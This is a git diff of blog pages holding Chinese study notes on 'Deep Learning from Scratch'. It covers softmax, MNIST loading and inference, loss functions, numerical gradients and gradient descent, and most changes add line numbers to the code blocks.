                        a = np.array([1010, 1000, 990])
                        np.exp(a) / np.sum(np.exp(a))
                        C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: overflow encountered in exp
                           np.exp(a) / np.sum(np.exp(a))
                         C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: invalid value encountered in true_divide
                        @@ -554,19 +552,19 @@ 

                        c = np.max(a)
                        a - c
                        +
                        1
                        2
                        c = np.max(a)
                        a - c
                        array([  0, -10, -20])
                         
                        -
                        np.exp(a-c) / np.sum(np.exp(a-c))
                        +
                        1
                        np.exp(a-c) / np.sum(np.exp(a-c))
                        array([9.99954600e-01, 4.53978686e-05, 2.06106005e-09])
                         

                        综上,我们可以像下面这样实现 softmax 函数。

                        -
                        def softmax(a):
                        c = np.max(a)
                        exp_a = np.exp(a - c) # 溢出对策
                        sum_exp_a = np.sum(exp_a)
                        y = exp_a / sum_exp_a
                        return y
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        def softmax(a):
                        c = np.max(a)
                        exp_a = np.exp(a - c) # 溢出对策
                        sum_exp_a = np.sum(exp_a)
                        y = exp_a / sum_exp_a
                        return y

                        3.5.3softmax 函数的特征

                        -
                        a = np.array([0.3, 2.9, 4.0])
                        y = softmax(a)
                        y
                        +
                        1
                        2
                        3
                        a = np.array([0.3, 2.9, 4.0])
                        y = softmax(a)
                        y
                        array([0.01821127, 0.24519181, 0.73659691])
                         
                        -
                        np.sum(y)
                        +
                        1
                        np.sum(y)
                        1.0
                         
                          @@ -586,7 +584,7 @@

                          mnist.py 时,当前目录必须是 ch01、ch02、ch03、…、ch08 目录中的一个。使
                          mnist.py 中的 load_mnist()函数,就可以按下述方式轻松读入 MNIST 数据。

        -
        import sys, os
        sys.path.append(os.pardir) # 为了导入父目录中的文件而进行的设定
        from dataset.mnist import load_mnist

        # 第一次调用会花费几分钟……
        # load_mnist 函数以“( 训练图像, 训练标签),( 测试图像,测试标签)”的形式返回读入的 MNIST 数据
        (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
        +
        1
        2
        3
        4
        5
        6
        7
        import sys, os
        sys.path.append(os.pardir) # 为了导入父目录中的文件而进行的设定
        from dataset.mnist import load_mnist

        # 第一次调用会花费几分钟……
        # load_mnist 函数以“( 训练图像, 训练标签),( 测试图像,测试标签)”的形式返回读入的 MNIST 数据
        (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
        Downloading train-images-idx3-ubyte.gz ... 
         Done
         Downloading train-labels-idx1-ubyte.gz ... 
        @@ -606,14 +604,14 @@ 

        # 输出各个数据的形状
        print(x_train.shape) # (60000, 784)
        print(t_train.shape) # (60000,)
        print(x_test.shape) # (10000, 784)
        print(t_test.shape) # (10000,)
        +
        1
        2
        3
        4
        5
        # 输出各个数据的形状
        print(x_train.shape) # (60000, 784)
        print(t_train.shape) # (60000,)
        print(x_test.shape) # (10000, 784)
        print(t_test.shape) # (10000,)
        (60000, 784)
         (60000,)
         (10000, 784)
         (10000,)
         

        试着显示 MNIST 图像,同时也确认一下数据

        -
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from dataset.mnist import load_mnist
        from PIL import Image
        import matplotlib.pyplot as plt


        def img_show(img):
        pil_img = Image.fromarray(np.uint8(img))
        pil_img.show()

        (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
        img = x_train[0]
        label = t_train[0]
        print(label) # 5

        print(img.shape) # (784,)
        img = img.reshape(28, 28) # 把图像的形状变成原来的尺寸
        print(img.shape) # (28, 28)
        plt.imshow(img, cmap='gray')
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from dataset.mnist import load_mnist
        from PIL import Image
        import matplotlib.pyplot as plt


        def img_show(img):
        pil_img = Image.fromarray(np.uint8(img))
        pil_img.show()

        (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
        img = x_train[0]
        label = t_train[0]
        print(label) # 5

        print(img.shape) # (784,)
        img = img.reshape(28, 28) # 把图像的形状变成原来的尺寸
        print(img.shape) # (28, 28)
        plt.imshow(img, cmap='gray')
        5
         (784,)
         (28, 28)
        @@ -639,30 +637,30 @@ 

        def get_data():
        """
        获取数据
        """
        (x_train, t_train), (x_test, t_test) = \
        load_mnist(normalize=True, flatten=True, one_hot_label=False)
        return x_test, t_test
        +
        1
        2
        3
        4
        5
        6
        7
        def get_data():
        """
        获取数据
        """
        (x_train, t_train), (x_test, t_test) = \
        load_mnist(normalize=True, flatten=True, one_hot_label=False)
        return x_test, t_test

        将 normalize 设置成True后,函数内部会进行转换,将图像的各个像素值除以 255,使得数据的值在 0.0~1.0 的范围内。像这样把数据限定到某个范围内的处理称为正规化(normalization)。此外,对神经网络的输入数据进行某种既定的转换称为预处理(pre-processing)
        这里,作为对输入图像的一种预处理,我们进行了正规化。

        -
        def init_network():
        """
        读入保存在 pickle 文件 sample_weight.pkl 中的学习到的权重参数
        这个文件中以字典变量的形式保存了权重和偏置参数
        """
        with open("sample_weight.pkl", 'rb') as f:
        network = pickle.load(f)
        return network
        -
        def predict(network, x):
        """
        前向传播
        """
        W1, W2, W3 = network['W1'], network['W2'], network['W3']
        b1, b2, b3 = network['b1'], network['b2'], network['b3']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        z2 = sigmoid(a2)
        a3 = np.dot(z2, W3) + b3
        y = softmax(a3)

        return y
        -
        import pickle

        x, t = get_data()
        network = init_network()

        accuracy_cnt = 0
        for i in range(len(x)):
        """
        用 for 语句逐一取出保存在 x 中的图像数据,用 predict()函数进行分类。
        predict()函数以 NumPy 数组的形式输出各个标签对应的概率。
        """
        y = predict(network, x[i])
        p = np.argmax(y) # 获取概率最高的元素的索引
        if p == t[i]:
        accuracy_cnt += 1

        print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
        +
        1
        2
        3
        4
        5
        6
        7
        8
        def init_network():
        """
        读入保存在 pickle 文件 sample_weight.pkl 中的学习到的权重参数
        这个文件中以字典变量的形式保存了权重和偏置参数
        """
        with open("sample_weight.pkl", 'rb') as f:
        network = pickle.load(f)
        return network
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        def predict(network, x):
        """
        前向传播
        """
        W1, W2, W3 = network['W1'], network['W2'], network['W3']
        b1, b2, b3 = network['b1'], network['b2'], network['b3']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        z2 = sigmoid(a2)
        a3 = np.dot(z2, W3) + b3
        y = softmax(a3)

        return y
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        import pickle

        x, t = get_data()
        network = init_network()

        accuracy_cnt = 0
        for i in range(len(x)):
        """
        用 for 语句逐一取出保存在 x 中的图像数据,用 predict()函数进行分类。
        predict()函数以 NumPy 数组的形式输出各个标签对应的概率。
        """
        y = predict(network, x[i])
        p = np.argmax(y) # 获取概率最高的元素的索引
        if p == t[i]:
        accuracy_cnt += 1

        print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
        Accuracy:0.9352
         

        3.6.3 批处理

        输出刚才的神经网络的各层的权重的形状。

        -
        x, _ = get_data()
        network = init_network()
        W1, W2, W3 = network['W1'], network['W2'], network['W3']
        -
        x.shape
        +
        1
        2
        3
        x, _ = get_data()
        network = init_network()
        W1, W2, W3 = network['W1'], network['W2'], network['W3']
        +
        1
        x.shape
        (10000, 784)
         
        -
        x[0].shape
        +
        1
        x[0].shape
        (784,)
         
        -
        W1.shape
        +
        1
        W1.shape
        (784, 50)
         
        -
        W2.shape
        +
        1
        W2.shape
        (50, 100)
         
        -
        W3.shape
        +
        1
        W3.shape
        (100, 10)
         

        从整体的处理流程来看,图 3-26 中,输入一个由 784 个元素(原本是一个 28 × 28 的二维数组)构成的一维数组后,输出一个有 10 个元素的一维数组。这是只输入一张图像数据时的处理流程。

        @@ -672,7 +670,7 @@

        3. 100 张图像打包作为输入数据。

        png

        这种打包式的输入数据称为批(batch)。批有“捆”的意思,图像就如同纸币一样扎成一捆。

        -
        x, t = get_data()
        network = init_network()

        batch_size = 100 # 批数量
        accuracy_cnt = 0

        for i in range(0, len(x), batch_size):
        """
        在 range()函数生成的列表的基础上,通过 x[i:i+batch_size]从输入数据中抽出批数据。
        x[i:i+batch_n]会取出从第 i 个到第 i+batch_n 个之间的数据。
        """
        x_batch = x[i:i+batch_size]
        y_batch = predict(network, x_batch)
        """
        参数 axis=1。这指定了在 100 × 10 的数组中,沿着第 1 维方向(以第 1 维为轴)
        找到值最大的元素的索引(第 0 维对应第 1 个维度)。
        """
        p = np.argmax(y_batch, axis=1) #
        accuracy_cnt += np.sum(p == t[i:i+batch_size])

        print("Accuracy:" + str(float(accuracy_cnt) / len(x)))
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        x, t = get_data()
        network = init_network()

        batch_size = 100 # 批数量
        accuracy_cnt = 0

        for i in range(0, len(x), batch_size):
        """
        在 range()函数生成的列表的基础上,通过 x[i:i+batch_size]从输入数据中抽出批数据。
        x[i:i+batch_n]会取出从第 i 个到第 i+batch_n 个之间的数据。
        """
        x_batch = x[i:i+batch_size]
        y_batch = predict(network, x_batch)
        """
        参数 axis=1。这指定了在 100 × 10 的数组中,沿着第 1 维方向(以第 1 维为轴)
        找到值最大的元素的索引(第 0 维对应第 1 个维度)。
        """
        p = np.argmax(y_batch, axis=1) #
        accuracy_cnt += np.sum(p == t[i:i+batch_size])

        print("Accuracy:" + str(float(accuracy_cnt) / len(x)))
        Accuracy:0.9352
         

        3.7 小结

        @@ -4628,6 +4626,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-4-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\255\246\344\271\240/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-4-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\255\246\344\271\240/index.html" index 887f982c0a..bd429a71bb 100644 --- "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-4-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\255\246\344\271\240/index.html" +++ "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-4-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\255\246\344\271\240/index.html" @@ -44,8 +44,6 @@ - - @@ -422,22 +420,22 @@

        4.2.1 均方误差

        $$E=\frac{1}{2}\sum_k(y_k-t_k)^2$$

        $y_k$ 表示神经网络的输出,$t_k$ 表示监督数据,$k$ 表示数据的维数。

        -
        def mean_squared_error(y, t):
        return 0.5 * np.sum((y - t) ** 2)
        -
        # 设“2”为正确解
        t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
        -
        # 例 1:“2”的概率最高的情况(0.6)
        y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
        mean_squared_error(np.array(y), np.array(t))
        +
        1
        2
        def mean_squared_error(y, t):
        return 0.5 * np.sum((y - t) ** 2)
        +
        1
        2
        # 设“2”为正确解
        t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
        +
        1
        2
        3
        # 例 1:“2”的概率最高的情况(0.6)
        y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
        mean_squared_error(np.array(y), np.array(t))
        0.09750000000000003
         
        -
        # 例 2:“7”的概率最高的情况(0.6)
        y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
        mean_squared_error(np.array(y), np.array(t))
        +
        1
        2
        3
        # 例 2:“7”的概率最高的情况(0.6)
        y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
        mean_squared_error(np.array(y), np.array(t))
        0.5975
         

        均方误差显示第一个例子的输出结果与监督数据更加吻合。

        4.2.2 交叉熵误差

        $$E=-\sum_kt_k\log y_k$$

        -
        def cross_entropy_error(y, t):
        """
        参数 y 和 t 是 NumPy 数组。函数内部在计算 np.log 时,加上了一
        个微小值 delta。这是因为,当出现 np.log(0)时,np.log(0)会变为负无限大
        的-inf,这样一来就会导致后续计算无法进行。作为保护性对策,添加一个
        微小值可以防止负无限大的发生。
        """
        delta = 1e-7
        return -np.sum(t * np.log(y + delta))
        -
        t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
        y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
        cross_entropy_error(np.array(y), np.array(t))
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        def cross_entropy_error(y, t):
        """
        参数 y 和 t 是 NumPy 数组。函数内部在计算 np.log 时,加上了一
        个微小值 delta。这是因为,当出现 np.log(0)时,np.log(0)会变为负无限大
        的-inf,这样一来就会导致后续计算无法进行。作为保护性对策,添加一个
        微小值可以防止负无限大的发生。
        """
        delta = 1e-7
        return -np.sum(t * np.log(y + delta))
        +
        1
        2
        3
        t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
        y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
        cross_entropy_error(np.array(y), np.array(t))
        0.510825457099338
         
        -
        y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
        cross_entropy_error(np.array(y), np.array(t))
        +
        1
        2
        y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
        cross_entropy_error(np.array(y), np.array(t))
        2.302584092994546
         

        4.2.3mini-batch 学习

        @@ -452,23 +450,23 @@

        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from dataset.mnist import load_mnist

        # 通过设定参数 one_hot_label=True,
        # 可以得到 one-hot 表示(即仅正确解标签为 1,其余为 0 的数据结构)。
        (x_train, t_train), (x_test, t_test) = \
        load_mnist(normalize=True, one_hot_label=True)
        print(x_train.shape) # (60000, 784) 训练数据有 60000 个,输入数据是 784 维(28 × 28)的图像数据
        print(t_train.shape) # (60000, 10) 监督数据是 10 维的数据
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from dataset.mnist import load_mnist

        # 通过设定参数 one_hot_label=True,
        # 可以得到 one-hot 表示(即仅正确解标签为 1,其余为 0 的数据结构)。
        (x_train, t_train), (x_test, t_test) = \
        load_mnist(normalize=True, one_hot_label=True)
        print(x_train.shape) # (60000, 784) 训练数据有 60000 个,输入数据是 784 维(28 × 28)的图像数据
        print(t_train.shape) # (60000, 10) 监督数据是 10 维的数据
        (60000, 784)
         (60000, 10)
         

        从这个训练数据中随机抽取 10 笔数据。

        -
        train_size = x_train.shape[0]
        batch_size = 10
        batch_mask = np.random.choice(train_size, batch_size)
        x_batch = x_train[batch_mask]
        t_batch = t_train[batch_mask]
        +
        1
        2
        3
        4
        5
        train_size = x_train.shape[0]
        batch_size = 10
        batch_mask = np.random.choice(train_size, batch_size)
        x_batch = x_train[batch_mask]
        t_batch = t_train[batch_mask]

        使用 np.random.choice() 可以从指定的数字中随机选择想要的数字。

        比如,np.random.choice(60000, 10) 会从 0 到 59999 之间随机选择 10 个数字

        -
        np.random.choice(60000, 10)
        +
        1
        np.random.choice(60000, 10)
        array([30142, 18947,  8349, 38135,  8519, 25729, 36061, 11248, 12602,
                31498])
         

        4.2.4mini-batch 版交叉熵误差的实现

        监督数据 $t$ 是独热编码的形式时:

        -
        def cross_entropy_error(y, t):
        if y.ndim == 1:
        # y 的维度为 1 时,即求单个数据的交叉熵误差时,需要改变数据的形状
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

        batch_size = y.shape[0]
        # 当输入为 mini-batch 时,要用 batch 的个数进行正规化,计算单个数据的平均交叉熵误差
        return -np.sum(t * np.log(y + 1e-7)) / batch_size
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        def cross_entropy_error(y, t):
        if y.ndim == 1:
        # y 的维度为 1 时,即求单个数据的交叉熵误差时,需要改变数据的形状
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

        batch_size = y.shape[0]
        # 当输入为 mini-batch 时,要用 batch 的个数进行正规化,计算单个数据的平均交叉熵误差
        return -np.sum(t * np.log(y + 1e-7)) / batch_size

        当监督数据是标签形式(非 one-hot 表示,而是像“2”“7”这样的标签)时:

        -
        def cross_entropy_error(y, t):
        if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

        batch_size = y.shape[0]
        # y[np.arange(batch_size), t]能抽出各个数据的正确解标签对应的神经网络的输出
        return -np.sum(np.log(y[np.arange(batch_size), t] + 1e-7)) / batch_size
        +
        1
        2
        3
        4
        5
        6
        7
        8
        def cross_entropy_error(y, t):
        if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

        batch_size = y.shape[0]
        # y[np.arange(batch_size), t]能抽出各个数据的正确解标签对应的神经网络的输出
        return -np.sum(np.log(y[np.arange(batch_size), t] + 1e-7)) / batch_size

        4.2.5 为何要设定损失函数

        在进行神经网络的学习时,不能将识别精度作为指标。因为如果以识别精度为指标,则参数的导数在绝大多数地方都会变为 0(识别精度是离散的,对微小的参数变化基本上没有什么反应,即便有反应,它的值也是不连续地、突然地变化)。

        4.3 数值微分

        @@ -476,7 +474,7 @@

        4.3.1 导数导数定义式:

        $$\frac{\mathrm df(x)}{\mathrm dx}=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}$$

        不好的实现示例:

        -
        def numerical_diff(f, x):
        h = 10e-50
        return (f(x+h) - f(x)) / h
        +
        1
        2
        3
        def numerical_diff(f, x):
        h = 10e-50
        return (f(x+h) - f(x)) / h
        • $h$ 的值太小,会产生舍入误差

          @@ -486,43 +484,43 @@

          4.3.1 导数

        $$\frac{\mathrm d f(x)}{\mathrm x}=\lim_{h\to 0}\frac{f(x+h)-f(x-h)}{2h}$$

        -
        def numerical_diff(f, x):
        h = 1e-4 # 0.0001
        return (f(x + h) - f(x - h)) / (2 * h)
        +
        1
        2
        3
        def numerical_diff(f, x):
        h = 1e-4 # 0.0001
        return (f(x + h) - f(x - h)) / (2 * h)

        4.3.2 数值微分的例子

        对 $y=0.01x^2+0.1x$ 求微分:

        -
        def function_1(x):
        return 0.01 * x ** 2 + 0.1 * x
        -
        import numpy as np
        import matplotlib.pylab as plt

        x = np.arange(0.0, 20.0, 0.1) # 以 0.1 为单位,从 0 到 20 的数组 x
        y = function_1(x)
        plt.xlabel("x")
        plt.ylabel("f(x)")
        plt.plot(x, y)
        plt.show()
        +
        1
        2
        def function_1(x):
        return 0.01 * x ** 2 + 0.1 * x
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        import numpy as np
        import matplotlib.pylab as plt

        x = np.arange(0.0, 20.0, 0.1) # 以 0.1 为单位,从 0 到 20 的数组 x
        y = function_1(x)
        plt.xlabel("x")
        plt.ylabel("f(x)")
        plt.plot(x, y)
        plt.show()

        png

        -
        numerical_diff(function_1, 5)
        +
        1
        numerical_diff(function_1, 5)
        0.1999999999990898
         
        -
        numerical_diff(function_1, 10)
        +
        1
        numerical_diff(function_1, 10)
        0.2999999999986347
         

        4.3.3 偏导数

        对于函数 $f(x_0,x_1)=x2_0+x2_1$:

        -
        def function_2(x):
        return x[0] ** 2 + x[1] ** 2 # 或者 return np.sum(x ** 2)
        +
        1
        2
        def function_2(x):
        return x[0] ** 2 + x[1] ** 2 # 或者 return np.sum(x ** 2)

        当 $x_0=3,x_1=4$ 时,关于 $x_0$ 的偏导数 $\frac{\partial f}{\partial x_0} $:

        -
        def function_tmp1(x0):
        return x0*x0 + 4.0**2.0

        numerical_diff(function_tmp1, 3.0)
        +
        1
        2
        3
        4
        def function_tmp1(x0):
        return x0*x0 + 4.0**2.0

        numerical_diff(function_tmp1, 3.0)
        6.00000000000378
         

        当 $x_0=3,x_1=4$ 时,关于 $x_1$ 的偏导数 $\frac{\partial f}{\partial x_1} $:

        -
        def function_tmp2(x1):
        return 3.0 ** 2.0 + x1 * x1

        numerical_diff(function_tmp2, 4.0)
        +
        1
        2
        3
        4
        def function_tmp2(x1):
        return 3.0 ** 2.0 + x1 * x1

        numerical_diff(function_tmp2, 4.0)
        7.999999999999119
         

        4.4 梯度

        像 $\left(\frac{\partial f}{\partial x_0},\frac{\partial f}{\partial x_1}\right)$ 这样的由全部变量的偏导数汇总而成的向量称为梯度(gradient)

        -
        def numerical_gradient(f, x):
        h = 1e-4 # 0.0001
        grad = np.zeros_like(x) # 生成和 x 形状相同的数组
        for idx in range(x.size):
        tmp_val = x[idx]

        # f(x+h)的计算
        x[idx] = tmp_val + h
        fxh1 = f(x)

        # f(x-h)的计算
        x[idx] = tmp_val - h
        fxh2 = f(x)

        grad[idx] = (fxh1 - fxh2) / (2 * h)
        x[idx] = tmp_val # 还原值

        return grad
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        def numerical_gradient(f, x):
        h = 1e-4 # 0.0001
        grad = np.zeros_like(x) # 生成和 x 形状相同的数组
        for idx in range(x.size):
        tmp_val = x[idx]

        # f(x+h)的计算
        x[idx] = tmp_val + h
        fxh1 = f(x)

        # f(x-h)的计算
        x[idx] = tmp_val - h
        fxh2 = f(x)

        grad[idx] = (fxh1 - fxh2) / (2 * h)
        x[idx] = tmp_val # 还原值

        return grad

        求点 $(3,4)$、$(0,2)$、$(3,0)$ 处的梯度:

        -
        numerical_gradient(function_2, np.array([3.0, 4.0]))
        +
        1
        numerical_gradient(function_2, np.array([3.0, 4.0]))
        array([6., 8.])
         
        -
        numerical_gradient(function_2, np.array([0.0, 2.0]))
        +
        1
        numerical_gradient(function_2, np.array([0.0, 2.0]))
        array([0., 4.])
         
        -
        numerical_gradient(function_2, np.array([3.0, 0.0]))
        +
        1
        numerical_gradient(function_2, np.array([3.0, 0.0]))
        array([6., 0.])
         
        -

        +
        1

        No artists with labels found to put in legend.  Note that artists whose label start with an underscore are ignored when legend() is called with no argument.
         

        png

        @@ -542,18 +540,18 @@

        4.

        一般来说,神经网络(深度学习)中,梯度法主要是指梯度下降法。

        $$x_0=x_0-\eta\frac{\partial f}{\partial x_0} \ x_1=x_1-\eta\frac{\partial f}{\partial x_1}$$

        $\eta$ 表示更新量,在神经网络的学习中,称为学习率(learning rate)。学习率决定在一次学习中,应该学习多少,以及在多大程度上更新参数。

        -
        def gradient_descent(f, init_x, lr=0.01, step_num=100):
        """
        参数 f 是要进行最优化的函数
        init_x 是初始值
        lr 是学习率 learning rate
        step_num 是梯度法的重复次数
        numerical_gradient(f,x) 会求函数的梯度,用该梯度乘以学习率得到的值进行更新操作,由 step_num 指定重复的次数
        """
        x = init_x

        for i in range(step_num):
        grad = numerical_gradient(f, x)
        x -= lr * grad
        return x
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        def gradient_descent(f, init_x, lr=0.01, step_num=100):
        """
        参数 f 是要进行最优化的函数
        init_x 是初始值
        lr 是学习率 learning rate
        step_num 是梯度法的重复次数
        numerical_gradient(f,x) 会求函数的梯度,用该梯度乘以学习率得到的值进行更新操作,由 step_num 指定重复的次数
        """
        x = init_x

        for i in range(step_num):
        grad = numerical_gradient(f, x)
        x -= lr * grad
        return x

        请用梯度法求 $f(x_0+x_1)=x2_0+x2_1$ 的最小值:

        -
        def function_2(x):
        return x[0] ** 2 + x[1] ** 2
        -
        init_x = np.array([-3.0, 4.0])
        gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
        +
        1
        2
        def function_2(x):
        return x[0] ** 2 + x[1] ** 2
        +
        1
        2
        init_x = np.array([-3.0, 4.0])
        gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
        array([-6.11110793e-10,  8.14814391e-10])
         

        学习率过大,会发散成一个很大的值:

        -
        # 学习率过大的例子:lr=10.0
        init_x = np.array([-3.0, 4.0])
        gradient_descent(function_2, init_x=init_x, lr=10.0, step_num=100)
        +
        1
        2
        3
        # 学习率过大的例子:lr=10.0
        init_x = np.array([-3.0, 4.0])
        gradient_descent(function_2, init_x=init_x, lr=10.0, step_num=100)
        array([-2.58983747e+13, -1.29524862e+12])
         

        学习率过小,基本没怎么更新就结束了:

        -
        # 学习率过小的例子:lr=1e-10
        init_x = np.array([-3.0, 4.0])
        gradient_descent(function_2, init_x=init_x, lr=1e-10, step_num=100)
        +
        1
        2
        3
        # 学习率过小的例子:lr=1e-10
        init_x = np.array([-3.0, 4.0])
        gradient_descent(function_2, init_x=init_x, lr=1e-10, step_num=100)
        array([-2.99999994,  3.99999992])
         
        @@ -564,24 +562,24 @@

        $$\mathbf W = \begin{pmatrix} w_{11} & w_{12} & w_{13}\ w_{21} & w_{22} & w_{23} \end{pmatrix}$$

        $$\frac{\partial L}{\partial \mathbf W} = \begin{pmatrix}\frac{\partial L}{\partial w_{11}} & \frac{\partial L}{\partial w_{12}} & \frac{\partial L}{\partial w_{13}}\ \frac{\partial L}{\partial w_{21}} & \frac{\partial L}{\partial w_{22}} & \frac{\partial L}{\partial w_{23}}\end{pmatrix}$$

        以一个简单的神经网络为例,来实现求梯度:

        -
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from common.functions import softmax, cross_entropy_error
        from common.gradient import numerical_gradient

        class simpleNet:
        def __init__(self):
        # 用高斯分布进行初始化 randn 函数返回一个或一组样本,具有标准正态分布,大小为 2x3
        self.W = np.random.randn(2, 3)

        def predict(self, x):
        return np.dot(x, self.W)

        def loss(self, x, t):
        z = self.predict(x)
        y = softmax(z)
        loss = cross_entropy_error(y, t)
        return loss
        -
        net = simpleNet()
        print(net.W) # 权重参数
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        import sys, os
        sys.path.append(os.pardir)
        import numpy as np
        from common.functions import softmax, cross_entropy_error
        from common.gradient import numerical_gradient

        class simpleNet:
        def __init__(self):
        # 用高斯分布进行初始化 randn 函数返回一个或一组样本,具有标准正态分布,大小为 2x3
        self.W = np.random.randn(2, 3)

        def predict(self, x):
        return np.dot(x, self.W)

        def loss(self, x, t):
        z = self.predict(x)
        y = softmax(z)
        loss = cross_entropy_error(y, t)
        return loss
        +
        1
        2
        net = simpleNet()
        print(net.W) # 权重参数
        [[ 0.10279342  0.41541928 -0.05036625]
          [-1.08414222  0.75288578  0.93188472]]
         
        -
        x = np.array([0.6, 0.9])
        p = net.predict(x)
        print(p)
        +
        1
        2
        3
        x = np.array([0.6, 0.9])
        p = net.predict(x)
        print(p)
        [-0.91405194  0.92684877  0.8084765 ]
         
        -
        np.argmax(p)  # 最大值的索引
        +
        1
        np.argmax(p)  # 最大值的索引
        1
         
        -
        t = np.array([0, 0, 1])  # 正确的解的标签
        net.loss(x, t)
        +
        1
        2
        t = np.array([0, 0, 1])  # 正确的解的标签
        net.loss(x, t)
        0.834766753254781
         
        -
        def f(W):
        """
        这里定义的函数 f(W)的参数 W 是一个伪参数。
        因为 numerical_gradient(f, x)会在内部执行 f(x), 为了与之兼容而定义了 f(W)
        """
        return net.loss(x, t)
        +
        1
        2
        3
        4
        5
        6
        def f(W):
        """
        这里定义的函数 f(W)的参数 W 是一个伪参数。
        因为 numerical_gradient(f, x)会在内部执行 f(x), 为了与之兼容而定义了 f(W)
        """
        return net.loss(x, t)

        或用 lambda 表示法:

        -
        f = lambda w: net.loss(x, t)
        -
        dW = numerical_gradient(f, net.W)
        print(dW)
        +
        1
        f = lambda w: net.loss(x, t)
        +
        1
        2
        dW = numerical_gradient(f, net.W)
        print(dW)
        [[ 0.04650845  0.29310612 -0.33961457]
          [ 0.06976267  0.43965918 -0.50942185]]
         
        @@ -620,15 +618,15 @@

        因为这里使用的数据是随机选择的 mini batch 数据,所以又称为随机梯度下降法(stochastic gradient descent)。“随机”指的是“随机选择的”的意思,因此,随机梯度下降法是“对随机选择的数据进行的梯度下降法”。深度学习的很多框架中,随机梯度下降法一般由一个名为 SGD 的函数来实现。

        4.5.1 2 层神经网络的类

        -
        import sys, os
        sys.path.append(os.pardir)
        from common.functions import *
        from common.gradient import numerical_gradient

        class TwoLayerNet:


        def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        初始化权重
        params 保存神经网络的参数的字典型变量(实例变量)。
        input_size: 输入层的神经元数
        hidden_size: 隐藏层的神经元数
        output_size: 输出层的神经元数
        """
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)


        def predict(self, x):
        """
        进行推理,x 是图像数据
        """
